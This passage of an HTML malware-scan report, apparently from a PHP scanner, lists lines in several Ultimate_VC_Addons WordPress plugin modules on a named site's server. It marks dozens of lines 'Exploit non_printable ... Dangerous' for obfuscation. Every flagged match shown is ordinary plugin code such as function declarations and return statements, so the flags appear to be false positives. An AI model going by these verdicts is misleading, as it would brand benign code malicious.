<span style="color: #0000BB"></span><span style="color: #007700">Function for </span><span style="color: #0000BB">Fancy text assets</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_fancytext_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to intialize the fancy text module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_fancytext_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 486</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">block</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 493</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_fancytext_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 745</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 746</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 747</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 774</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 810</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Fancy text Module</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_446").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_ribbons.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 20.29 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_447" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_Ribbons</span><span style="color: #007700">(); if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Ribbon' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Ultimate_Ribbon </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Ribbon Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Ribbon module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Ultimate Ribbon Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Ribbon Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 333</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_ribbons_module_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_ribbons_module_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Ultimate Ribbon Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_ribbons_module_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 496</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 502</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_447").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_dual_colors.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 37.56 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 11</span><br><table id="file_448" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_Dual_Colors</span><span style="color: #007700">(); if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Dual_Color' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Ultimate_Dual_Color </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate_List_Icon</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">Dual color Heading assets</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_dual_colors_module_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">Init</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_dual_colors_module_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">Dual color Heading shotcode</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 597</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_dual_colors_module_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 909</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_448").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_font_manager.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 30.48 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 27</span><br><table id="file_449" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">; } </span><span style="color: #0000BB">$main </span><span style="color: #007700">= array(); </span><span style="color: #0000BB">$subset_main_array </span><span style="color: #007700">= array(); </span><span style="color: #0000BB">$fonts </span><span style="color: #007700">= array(); </span><span style="color: #0000BB">$subset_call </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">; if ( ! empty( </span><span style="color: #0000BB">$enqueue_fonts </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$font_count </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">; foreach ( </span><span style="color: #0000BB">$enqueue_fonts </span><span style="color: #007700">as </span><span style="color: #0000BB">$key </span><span style="color: #007700">=> </span><span style="color: #0000BB">$efont </span><span style="color: #007700">) { </span><span style="color: #0000BB">$font_name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">; </span><span style="color: #0000BB">$font_call </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">; </span><span style="color: #0000BB">$font_variant </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">; </span><span style="color: #0000BB">$font_arr </span><span style="color: #007700">= </span><span style="color: #0000BB">arr</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_google_font_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_selected_ultimate_google_fonts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 207</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_font_manager_dashboard</span><span style="color: #007700">() { </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">refresh_google_fonts_list</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 320</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FunctionUse</span><span style="color: #007700">.</span><span style="color: #0000BB">NewFunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">is_countableFound</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 359</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_google_fonts_list</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 431</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_selected_google_font</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Parallax</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 464</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">delete_selected_google_font</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_selected_google_font</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_font_variants_callback</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Parallax</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 608</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'enquque_ultimate_google_fonts' </span><span style="color: #007700">) ) {</span>
</span>
